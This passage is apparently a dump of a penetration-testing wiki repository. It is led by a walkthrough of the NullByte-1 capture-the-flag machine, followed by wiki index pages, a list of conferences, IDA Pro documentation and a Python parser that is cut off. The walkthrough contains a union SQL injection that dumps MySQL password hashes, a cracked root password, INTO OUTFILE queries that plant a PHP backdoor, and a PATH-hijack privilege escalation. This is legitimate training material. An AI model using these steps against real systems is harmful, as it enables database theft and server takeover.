Starting Nmap 6.47 ( http://nmap.org ) at 2015-08-28 04:32 UTC
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 04:32
Scanning 192.168.10.32 [2 ports]
Completed Ping Scan at 04:32, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 04:32
Scanning 192.168.10.32 [65535 ports]
Discovered open port 80/tcp on 192.168.10.32
Discovered open port 111/tcp on 192.168.10.32
Discovered open port 42151/tcp on 192.168.10.32
Discovered open port 777/tcp on 192.168.10.32
Completed Connect Scan at 04:32, 4.18s elapsed (65535 total ports)
Initiating Service scan at 04:32
Scanning 4 services on 192.168.10.32
Completed Service scan at 04:32, 11.01s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.10.32.
Initiating NSE at 04:32
Completed NSE at 04:32, 0.17s elapsed
Nmap scan report for 192.168.10.32
Host is up (0.016s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-methods: GET HEAD POST OPTIONS
|_http-title: Null Byte 00 - level 1
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4      111/tcp  rpcbind
|   100000  2,3,4      111/udp  rpcbind
|   100024  1        42151/tcp  status
|_  100024  1        60595/udp  status
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
42151/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds

```

## Vuln Analysis ##

| Port   | Protocol   | Description                            |
|:-------|:-----------|:---------------------------------------|
| 80     | tcp        | Apache httpd 2.4.10 (Debian)           |
| 111    | tcp        | rpcbind                                |
| 777    | tcp        | OpenSSH 6.7p1 Debian 5 (protocol 2.0)  |
| 42151  | tcp        | Status                                 |

### HTTP ###

Accessing http://192.168.10.32:80/ shows a picture and a message: "If you search for the laws of harmony, you will find knowledge."

1. **Scan web directory**

```
┌─[lab@core]─[/tmp]
└──╼ python wfuzz.py -c -z file,/opt/fuzzdb/discovery/web-dir-list.txt --hc 404 http://192.168.10.32/FUZZ/
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer                    *
********************************************************

Target: http://192.168.10.32/FUZZ/
Total requests: 3932

==================================================================
ID      Response   Lines      Word         Chars          Request
==================================================================

01576:  C=403     11 L       32 W          298 Ch        ".htaccess"
01689:  C=403     11 L       32 W          294 Ch        "icons"
01775:  C=403     11 L       32 W          299 Ch        "javascript"
02526:  C=200     24 L      324 W         9115 Ch        "phpmyadmin"
02747:  C=403     11 L       32 W          298 Ch        ".htpasswd"
02922:  C=403     11 L       32 W          302 Ch        "server-status"
03496:  C=200      6 L       11 W          113 Ch        "uploads"

Total time: 9.983371
Processed Requests: 3932
Filtered Requests: 3925
Requests/sec.: 393.8549

```

Try [phpmyadmin](http://192.168.10.32/phpmyadmin/) and [uploads](http://192.168.10.32/uploads/). Brute forcing phpmyadmin with patator gives no result.


2. **Analyse the picture**

We need more, so download http://192.168.10.32/main.gif. Analysing it with exiftool shows:

```
┌─[lab@core]─[/tmp]
└──╼ exiftool main.gif
ExifTool Version Number         : 10.00
File Name                       : main.gif
Directory                       : .
File Size                       : 16 kB
File Modification Date/Time     : 2015:08:27 14:48:11+00:00
File Access Date/Time           : 2015:08:28 04:48:12+00:00
File Inode Change Date/Time     : 2015:08:28 04:48:12+00:00
File Permissions                : rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : url -> S0tLMG9hc3F3YXc=
Image Size                      : 235x302
Megapixels                      : 0.071
```

Woo, the url is here, in the Comment field.

```
┌─[lab@core]─[/tmp]
└──╼ printf S0tLMG9hc3F3YXc= | base64 -d
KKK0oasqwaw
```

Open http://192.168.10.32/KKK0oasqwaw/, which shows the following message:

```
Notices:

If you can understood the string, you can be to the next level.
It may be a name, a password , a url or something else.
-------------------------------------------------------------------------------------------------------------------------------------

MmUyZTJlMmUyMDJlMmUyZTJlMmQyMDJlMmQyZTIwMmQyZTJlMjAyZTJkMmQyMDJkMmQyZDJkMmQyMDJlMmQyZTIwMmQyZTJkMjA=
```

Decoding the string gives:

```
┌─[lab@core]─[/tmp]
└──╼ printf MmUyZTJlMmUyMDJlMmUyZTJlMmQyMDJlMmQyZTIwMmQyZTJlMjAyZTJkMmQyMDJkMmQyZDJkMmQyMDJlMmQyZTIwMmQyZTJkMjA= | base64 -d
2e2e2e2e202e2e2e2e2d202e2d2e202d2e2e202e2d2d202d2d2d2d2d202e2d2e202d2e2d20
┌─[lab@core]─[/tmp]
└──╼ printf MmUyZTJlMmUyMDJlMmUyZTJlMmQyMDJlMmQyZTIwMmQyZTJlMjAyZTJkMmQyMDJkMmQyZDJkMmQyMDJlMmQyZTIwMmQyZTJkMjA= | base64 -d | unhex
.... ....- .-. -.. .-- ----- .-. -.-
```

This is Morse code. Decoding it gives the string "h4rdw0rk". What does it mean?
- "It may be a name, a password , a url or something else."

We find the url "http://192.168.10.32/KKK0oasqwaw/h4rdw0rk.php", which asks for a "password". Entering one, the page shows "invalid key".


3. **Crack HTTP Form**

Choose your favourite tool to crack it, for example Burp Suite or Hydra.

The password is "password1".

If the password is correct, the page shows "Enter username".


4. **SQL Injection**

Enter the username `'`:

```
http://192.168.10.32/KKK0oasqwaw/888search.php?usrtosearch='
```

Fetched data successfully


Enter the username `"`:

```
http://192.168.10.32/KKK0oasqwaw/888search.php?usrtosearch="
```

Error Message:

**Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%"' at line 1**


Finally, we can read the mysql user table as follows:

```
http://192.168.10.32/KKK0oasqwaw/888search.php?usrtosearch=" union select 1,2,concat(user, 0x7c, password) from mysql.user-- #
```

We get usernames and password hashes:

```
EMP ID :1
EMP NAME : ramses
EMP POSITION :
--------------------------------
EMP ID :2
EMP NAME : isis
EMP POSITION : employee
--------------------------------
EMP ID :1
EMP NAME : 2
EMP POSITION : root|*18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
EMP ID :1
EMP NAME : 2
EMP POSITION : debian-sys-maint|*BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC
--------------------------------
EMP ID :1
EMP NAME : 2
EMP POSITION : phpmyadmin|*18DC78FB0C441444482C7D1132C7A23D705DAFA7
--------------------------------
Fetched data successfully
```

Crack the hash on [hashkiller](http://www.hashkiller.co.uk/):

```
root:sunnyvale
```

5. **Upload Backdoors**

Log in to phpmyadmin with "root:sunnyvale" and upload your php backdoor to uploads (/var/www/html/uploads) with an SQL query:

```
-- the PHP source between the quotes did not survive extraction
select "" into outfile "/var/www/html/uploads/phpinfo.php";
select "" into outfile "/var/www/html/uploads/cmd.php"
```

Get an OS shell with msf, then:

```
www-data@NullByte:/var/www/backup$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@NullByte:/var/www/backup$ PATH="/var/www/backup:$PATH"
www-data@NullByte:/var/www/backup$ echo $PATH
/var/www/backup:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
www-data@NullByte:/var/www/backup$ ln -s /bin/sh ps
www-data@NullByte:/var/www/backup$ ./procwatch
# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 1170 Aug  2 01:45 proof.txt
# cat proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats.
Now you done that I wanna talk with you.
Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----

```

-------------------------------------------------------------------------------- /CTFS/README.md: --------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) >

----

# CTFS & PentestLab

The stronger you want to become, the more exercises you need.

# Links

1. https://www.vulnhub.com/
2. https://www.pentesterlab.com/
3. http://www.amanhardikar.com/mindmaps/Practice.html
4. http://r-7.co/Metasploitable2
-------------------------------------------------------------------------------- /Information-Security-Conferences/README.md: --------------------------------------------------------------------------------
## Information Security Conferences

- [DEF CON](https://www.defcon.org/) - An annual hacker convention in Las Vegas
- [Black Hat](http://www.blackhat.com/) - An annual security conference in Las Vegas
- [BSides](http://www.securitybsides.com/) - A framework for organising and holding security conferences
- [CCC](https://events.ccc.de/congress/) - An annual meeting of the international hacker scene in Germany
- [DerbyCon](https://www.derbycon.com/) - An annual hacker conference based in Louisville
- [PhreakNIC](http://phreaknic.info/) - A technology conference held annually in middle Tennessee
- [ShmooCon](http://shmoocon.org/) - An annual US east coast hacker convention
- [CarolinaCon](http://www.carolinacon.org/) - An infosec conference, held annually in North Carolina
- [CHCon](https://chcon.nz) - Christchurch Hacker Con, held annually in New Zealand
- [SummerCon](http://www.summercon.org/) - One of the oldest hacker conventions, held during Summer
- [Hack.lu](https://2016.hack.lu/) - An annual conference held in Luxembourg
- [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands
- [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany
- [Hack3rCon](http://hack3rcon.org/) - An annual US hacker conference
- [ThotCon](http://thotcon.org/) - An annual US hacker conference held in Chicago
- [LayerOne](http://www.layerone.org/) - An annual US security conference held every spring in Los Angeles
- [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria
- [SkyDogCon](http://www.skydogcon.com/) - A technology conference in Nashville
- [SECUINSIDE](http://secuinside.com) - Security Conference in [Seoul](https://en.wikipedia.org/wiki/Seoul)
- [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania
- [AppSecUSA](https://appsecusa.org/) - An annual conference organised by OWASP
- [BruCON](http://brucon.org) - An annual security conference in Belgium
- [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK
- [Nullcon](http://nullcon.net/website/) - An annual conference in Delhi and Goa, India
- [RSA Conference USA](https://www.rsaconference.com/) - An annual security conference in San Francisco, California, USA
- [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - An annual security conference in Lucerne, Switzerland
- [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - An annual conference, held in Denver, USA for 2016
- [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina
- [44Con](https://44con.com/) - Annual Security Conference held in London
- [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annually held in Novi Sad, Serbia
- [FSec](http://fsec.foi.hr) - Croatian Information Security Gathering in Varaždin, Croatia
- [SyScan360](https://www.syscan360.org/) - SyScan360 is a well-known Information Security Conference in Asia.
- [KCon](http://kcon.knownsec.com/) - KCon is a famous Hacker Con powered by Knownsec Team.
- [SecTor](https://sector.ca) - Canada's premier security conference, held annually in Toronto
- [HackFest](https://hackfest.ca/en/) - Largest hacking event in Canada, held annually in Quebec City
- [Steelcon](https://www.steelcon.info/) - Annual security conference held in Sheffield UK (also runs a kids track)
-------------------------------------------------------------------------------- /LICENSE: --------------------------------------------------------------------------------
The MIT License (MIT)

Copyright (c) 2016 Vex Woo

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
**Authors**: < [nixawk](https://github.com/nixawk) >, < [m1guelpf](https://github.com/m1guelpf) >, < [binarymist](https://github.com/binarymist) >

----

[![pentest-wiki](https://img.shields.io/badge/PENTEST-WIKI-black.svg)](https://github.com/nixawk/pentest-wiki) is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.

## Contents

- [![](https://img.shields.io/badge/Information%20Security%20Conferences-Index-blue.svg)](./Information-Security-Conferences)

- [![](https://img.shields.io/badge/Information%20Gathering-Index-blue.svg)](./1.Information-Gathering)

  - Network Analysis
    - IP
      - [Whois](1.Information-Gathering/How-to-gather-Whois-Information-Gathering.md)
      - [DNS](./1.Information-Gathering/How-to-gather-dns-information.md)
    - Identify Live Hosts
    - IDS/IPS Identification

  - Web Application
    - Web Application Fingerprint
    - CMS Identification
    - Open Source Analysis
    - IDS/IPS Identification

  - OSINT
    - GHDB
    - People
    - Pictures
    - Media
    - Company
    - Document

- [![](https://img.shields.io/badge/Vulnerability%20Assessment-Index-blue.svg)](./2.Vulnerability-Assessment)

  - Vulnerability Scanners
  - Network Assessment
  - Web Application Assessment
    - [OWASP CheatSheetSeries](https://github.com/OWASP/CheatSheetSeries/tree/master/cheatsheets)
  - Database Assessment
    - [MongoDB](./2.Vulnerability-Assessment/Database-Assessment/mongodb/mongodb_hacking.md)
    - [MySQL](./2.Vulnerability-Assessment/Database-Assessment/mysql)
    - [Postgresql](./2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md)
    - [Sqlite](./2.Vulnerability-Assessment/Database-Assessment/sqlite/sqlite_hacking.md)

  - Mobile Assessment
    - [Android](./2.Vulnerability-Assessment/Android-Assessment)
    - [OWASP-MASVS](https://github.com/OWASP/owasp-masvs)
    - [OWASP-MSTG](https://github.com/OWASP/owasp-mstg/)
  - OS Assessment
    - [Mac OSX](./2.Vulnerability-Assessment/OS-Assessment/OSX)

- [![](https://img.shields.io/badge/Exploitation%20Tools-Index-blue.svg)](./3.Exploitation-Tools) & [![](https://img.shields.io/badge/Post%20Exploitation-Index-blue.svg)](./4.Post-Exploitation)
  - Network Exploitation
    - [Vulnerable Ports List](./3.Exploitation-Tools/Network-Exploitation/ports_number.md)
    - [Cisco ASA CVE-2016-6366](./4.Post-Exploitation/How-to-hack-Cisco-ASA-with-CVE-2016-6366.md)
  - OS Exploitation
    - Windows
      - [Windows 2008 Active Directory Hacking](./4.Post-Exploitation/Windows_ActiveDirectory/Hacking_Windows_Active_Directory.md)
      - [Windows 2012 Credentials dump](./4.Post-Exploitation/Windows_ActiveDirectory/How-to-dump-windows2012-credentials.md)
      - [Metasploit - run vbs payload in cmd.exe](./4.Post-Exploitation/Windows_ActiveDirectory/Execute_metasploit_vbs_payload_in_cmd_shell.md)
      - [Windows Vssadmin](./4.Post-Exploitation/Windows_ActiveDirectory/How-to-use-vssadmin.md)
  - Web Exploitation
  - Database Exploitation
  - Wireless Exploitation
  - Social Engineering
  - Physical Exploitation
  - Open Source Exploitation

- [![](https://img.shields.io/badge/Privilege%20Escalation-Index-blue.svg)](./5.Privilege-Escalation)
  - Password Attacks
  - Privilege Escalation Media
    - [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
    - [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

  - Protocol Analysis
  - Spoofing Analysis

- [![](https://img.shields.io/badge/Maintaining%20Access-Index-blue.svg)](./6.Maintaining-Access)
  - OS Backdoors
  - Tunneling
  - Web Backdoors

- [![](https://img.shields.io/badge/Reporting-Index-blue.svg)](./7.Reporting)
  - [Public pentesting reports](https://github.com/juliocesarfort/public-pentesting-reports)

- [![](https://img.shields.io/badge/Books-Index-blue.svg)](./Books)
  - [Penetration Testing Books](./Books/README.md#penetration-testing-books)
  - [Hackers Handbook Series](./Books/README.md#hackers-handbook-series)
  - [Defensive Development](./Books/README.md#defensive-development)
  - [Network Analysis Books](./Books/README.md#network-analysis-books)
  - [Reverse Engineering Books](./Books/README.md#reverse-engineering-books)
  - [Malware Analysis Books](./Books/README.md#malware-analysis-books)
  - [Windows Books](./Books/README.md#windows-books)
  - [Social Engineering Books](./Books/README.md#social-engineering-books)
  - [Lock Picking Books](./Books/README.md#lock-picking-books)
  - [OSINT Books](./Books/README.md#osint-books)

- [![](https://img.shields.io/badge/CTFs-Index-blue.svg)](./CTFS)
  - [Flick](./CTFS/Flick)
  - [Nebula](./CTFS/Nebula)
  - [NullByte-1](./CTFS/NullByte/NullByte-1.md)

- [![](https://img.shields.io/badge/Reverse%20Engineering-Index-blue.svg)](./Reverse-Engineering)

- [![](https://img.shields.io/badge/System%20Services-Index-blue.svg)](./System-Services)
  - [FTP](./System-Services/services/service-ftp.md)
  - [HTTP](https://gist.github.com/willurd/5720255)

## How to contribute

1. Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.
2. Fork [the repository](https://github.com/nixawk/pentest-wiki) on GitHub to start making your changes to the **master** branch (or branch off of it).
3. Send a pull request and bug the maintainer until it gets merged and published.

## Links

- [The Penetration Testing Execution Standard](http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines)
- [Penetration Testing Framework 0.59](http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html)
- [How To Become A Hacker](http://www.catb.org/esr/faqs/hacker-howto.html)
- [Github - awesome-pentest](https://github.com/enaqx/awesome-pentest)
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/Background_Analysis.md:
--------------------------------------------------------------------------------

## Background Analysis

IDA analyzes a program in the background whenever it is not busy with an action you requested: you and IDA disassemble the program together, but your requests take priority.

The state of the background analysis is shown in the upper right-hand corner of the screen.

You can disable autoanalysis, but then some IDA functions will produce strange results (e.g. if you convert data into instructions, IDA will NOT trace all the threads of control flow, and the data will be converted into instructions only on the screen...).
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/Command_line_swithes.md:
--------------------------------------------------------------------------------

## Command line switches

![](https://github.com/all3g/exploit-exercises/blob/master/IDA/IDA-command-line-options.png)

IDA can be launched with one of the following command lines:

- idaq input-file (All platforms: start graphical interface)
- idaw input-file (Windows: start text interface)
- idal input-file (Linux/Mac: start text interface)

Add the '64' postfix to the command name in order to start the 64-bit version of IDA.
For example:

```idaq64 input-file```

will start the 64-bit graphical interface.

The following command line switches are recognized:

```
-a       disable auto analysis
-A       autonomous mode. IDA will not display dialog boxes.
         Designed to be used together with -S switch.
-b####   loading address, a hexadecimal number, in paragraphs
         (a paragraph is 16 bytes)
-B       batch mode. IDA will generate .IDB and .ASM files automatically
-c       disassemble a new file (delete the old database)
-ddirective
         A configuration directive which must be processed at the first
         pass. Example:
           -dVPAGESIZE=8192
-Ddirective
         A configuration directive which must be processed at the second
         pass.
-f       disable FPP instructions (IBM PC only)
-h       help screen
-i####   program entry point (hex)
-I#      set IDA as just-in-time debugger (0 to disable and 1 to enable)
-L####   name of the log file
-M       disable mouse (text only)
-O####   options to pass to plugins
-o####   specify the output database (implies -c)
-p####   processor type
-P+      compress database (create zipped idb)
-P       pack database (create unzipped idb)
-P-      do not pack database (not recommended, see Abort command)
-r###    immediately run the built-in debugger
         (the format of this switch is explained in the Instant debugger section)
-R       load MS Windows exe file resources
-S###    Execute a script file when the database is opened.
         The script file extension is used to determine which extlang will run the script.
         It is possible to pass command line arguments after the script name.
         For example: -S"myscript.idc argument1 \"argument 2\" argument3"
         The passed parameters are stored in the "ARGV" global IDC variable.
         Use "ARGV.count" to determine the number of arguments.
         The first argument "ARGV[0]" contains the script name
-T###    interpret the input file as the specified file type
         The file type is specified as a prefix of a file type
         visible in the 'load file' dialog box
-t       create an empty database.
-W###    specify MS Windows directory
-x       do not create segmentation
         (used in pair with Dump database command)
         this switch affects EXE and COM format files only.
-z       debug:
           00000001 drefs
           00000002 offsets
           00000004 first
           00000008 idp module
           00000010 idr module
           00000020 plugin module
           00000040 ids files
           00000080 config file
           00000100 check heap
           00000200 checkarg
           00000400 demangler
           00000800 queue
           00001000 rollback
           00002000 already data or code
           00004000 type system
           00008000 show all notifications
           00010000 debugger
           00200000 Appcall
           00400000 source-level debugger
-?       this screen (works for the next version)
?        this screen (works for the next version)
```

For batch mode, IDA must be invoked with the following command line:

```idaq -B input-file```

which is equivalent to

```idaq -c -A -Sanalysis.idc input-file```

The text interface (idaw.exe/idal) is better for batch mode because it uses fewer system resources. However, please note that regular plugins are not automatically loaded in batch mode, because the analysis .idc file quits and the kernel has no chance to load them.

For more information, please see the analysis.idc file in the IDC subdirectory.
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/IDA-command-line-options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/Reverse-Engineering/IDA/IDA-command-line-options.png
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/Instant_debugger.md:
--------------------------------------------------------------------------------

## Instant debugger

The -r command line switch is used to run the built-in debugger without creating a database in advance. The format of this switch is:

```-rdebname{params}:pass@hostname:port+pid```

The explanation of the fields:

```
debname   Debugger name. Should contain the debugger module name.
          Examples: win32, linux. This prefix can be shortened or
          even completely omitted if there is no ambiguity
params    Optional parameters for the debugger module.
          The parameters from the appropriate configuration file
          can be specified here, separated by semicolons.
pass      Password for the remote debugger server
hostname  Host name or address of the remote debugger server
port      Port number to use to connect to the debugger server
pid       PID of the process to attach
```

All fields except the first one are optional. See the examples below for typical command lines:

```
idaq -rwin32 file args
    Run 'file' with command line 'args' in the local debugger.
    We have to specify the debugger name to avoid ambiguities.
idaq -rwindbg+450
    Attach to process 450 on the local machine using the windbg backend
idaq -rl:password@mycom:4567+
    Connect to the remote linux computer 'mycom' at port 4567 using the
    password 'password' and display the list of processes running on it.
    Allow the user to select a process and attach to it.
idaq -rl@mycom /bin/ls e*
    Run the '/bin/ls' command on the 'mycom' computer using the
    remote linux debugger server. Use an empty password and the
    default port number. IDA will extract the name of the
    executable from the whobase.idb file in the local current
    directory. If the database does not exist, then this command
    will fail.
idaq "-rwindbg{MODE=1}@com:port=\\.\pipe\com_1,baud=115200,pipe,reconnect+"
    Attach using windbg in kernel mode. The connection string is
    "com:port=\\.\pipe\com_1,baud=115200,pipe,reconnect". A mini database
    will be created on the fly.
```

When the -r switch is used, IDA works with databases in the following way:

- if a database corresponding to the input file exists and the -c switch has not been specified, then IDA will use the database during the debugging session
- otherwise, a temporary database will be created

Temporary databases contain only meta-information about the debugged process and not memory contents. The user can make a memory snapshot at any time before the process stops. If IDA detects that a command will cause the process to exit or to detach from IDA, it will propose to make a snapshot.

The rest of the command line is passed to the launched process.

If there is no input file (for example, when attaching to an existing process), the temporary database is created in the standard temporary directory. On Windows, this directory is usually "Local Settings\Temp" in the user profile directory.
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/Main_Idea.md:
--------------------------------------------------------------------------------

## Main Idea

IDA is an interactive disassembler, which means that the user takes an active part in the disassembly process. IDA is not an automatic analyzer of programs: it will give you hints about suspicious instructions, unsolved problems, etc., but it is your job to tell IDA how to proceed.

If you are using IDA for the very first time, here are some commands that you will find very useful:

- convert to instruction: the hotkey is "C"
- convert to data: the hotkey is "D"

All the changes that you make are saved to disk. When you run IDA again, all the information on the file being disassembled is read back from disk, so that you can resume your work.

Take these two instructions:

```
CODE:00401000 6A 00                push    0
CODE:00401002 E8 64 02 00 00       call    GetModuleHandleA ; Call Procedure
```

With the cursor on the `call` line, press `D` and you will see:

```
CODE:00401000 6A 00                push    0
CODE:00401000 ; ---------------------------------------------------------------------------
CODE:00401002 E8                   db 0E8h
CODE:00401003 64                   db 64h ; d
CODE:00401004 02                   db 2
CODE:00401005 00                   db 0
CODE:00401006 00                   db 0
CODE:00401007 ; ---------------------------------------------------------------------------
```
--------------------------------------------------------------------------------
/Reverse-Engineering/IDA/Plugin_Options.md:
--------------------------------------------------------------------------------

## Plugin Options

The -O command line switch allows the user to pass options to plugins. A plugin which uses options should call the get_plugin_options() function to get them.

Since there may be plugins written by independent programmers, each option is prefixed with -O followed by the plugin name.

For example, a plugin named "decomp" should expect its parameters in the following format:

```
-Odecomp:option1:option2:option3
```

In this case, get_plugin_options("decomp") will return the "option1:option2:option3" part of the options string.
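The two switch formats described in the Instant debugger section above and in this Plugin Options section are small enough to parse by hand, which is a good way to check that a command line says what you think it says before it launches a debugger or a plugin. The following Python is an added example written for this page; it is not IDA code, does not call IDA, and only models the conventions quoted here. `parse_instant_debugger` takes the `-r` switch on its own (the rest of the command line, such as `file args`, is passed to the debuggee as the text says). Two assumptions are not stated on the page: a `+` never occurs inside the pass, host or port fields, and with several `-O` switches the modelled `get_plugin_options` returns everything after `<name>:` in the joined string (the page only shows the single-plugin case). In the windbg kernel-mode example, what the page calls the connection string lands in the `host` and `port` fields, so `port` is kept as text rather than a number.

```python
"""Parsers for two IDA command-line conventions: the -r instant-debugger
switch and the -O plugin-options switch.  Added example written for this
page; it is not IDA code and does not call IDA."""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class DebugTarget:
    debname: str                   # debugger module name (or an unambiguous prefix)
    params: Optional[str] = None   # text between { }, overrides config-file entries
    password: Optional[str] = None
    host: Optional[str] = None
    port: Optional[str] = None     # kept as text: windbg kernel mode puts a connection string here
    attach: bool = False           # a '+' was present
    pid: Optional[int] = None      # None together with attach=True means "show the process list"


def parse_instant_debugger(switch: str) -> DebugTarget:
    """Parse '-rdebname{params}:pass@hostname:port+pid'; only debname is mandatory.

    Assumption (not stated on the page): '+' never appears inside the pass,
    host or port fields, so the last '+' always introduces the pid."""
    if not switch.startswith("-r"):
        raise ValueError("not a -r switch: %r" % switch)
    rest = switch[2:]

    # 1. debugger name: everything up to the first field delimiter
    i = 0
    while i < len(rest) and rest[i] not in "{:@+":
        i += 1
    target = DebugTarget(debname=rest[:i])
    if not target.debname:
        raise ValueError("missing debugger name in %r" % switch)
    rest = rest[i:]

    # 2. optional {params}
    if rest.startswith("{"):
        close = rest.find("}")
        if close < 0:
            raise ValueError("unterminated {params} in %r" % switch)
        target.params = rest[1:close]
        rest = rest[close + 1:]

    # 3. optional +pid at the very end ('+' alone means: attach, ask which process)
    if "+" in rest:
        rest, pid_text = rest.rsplit("+", 1)
        target.attach = True
        if pid_text:
            target.pid = int(pid_text)

    # 4. optional :pass, then optional @hostname[:port]
    if "@" in rest:
        before, after = rest.split("@", 1)
        host, _, port = after.partition(":")
        target.host = host or None
        target.port = port or None
    else:
        before = rest
    if before.startswith(":"):
        target.password = before[1:]
    elif before:
        raise ValueError("unexpected text %r in %r" % (before, switch))
    return target


def collect_plugin_options(argv: List[str]) -> str:
    """Join every -O switch the way the page describes: strip the '-O' prefix
    and concatenate the pieces with ':' into one options string."""
    return ":".join(a[2:] for a in argv if a.startswith("-O") and len(a) > 2)


def get_plugin_options(options: str, plugin: str) -> Optional[str]:
    """Model of get_plugin_options(): the text after '<plugin>:' in the joined
    options string, or None if the plugin name is absent.  With a single -O
    switch this is exactly the page's example; for several switches it returns
    the remainder of the joined string, which is an assumption about IDA."""
    pieces = options.split(":")
    for idx, piece in enumerate(pieces):
        if piece == plugin:
            return ":".join(pieces[idx + 1:])
    return None


if __name__ == "__main__":
    for example in ("-rwin32", "-rwindbg+450", "-rl:password@mycom:4567+", "-rl@mycom",
                    r"-rwindbg{MODE=1}@com:port=\\.\pipe\com_1,baud=115200,pipe,reconnect+"):
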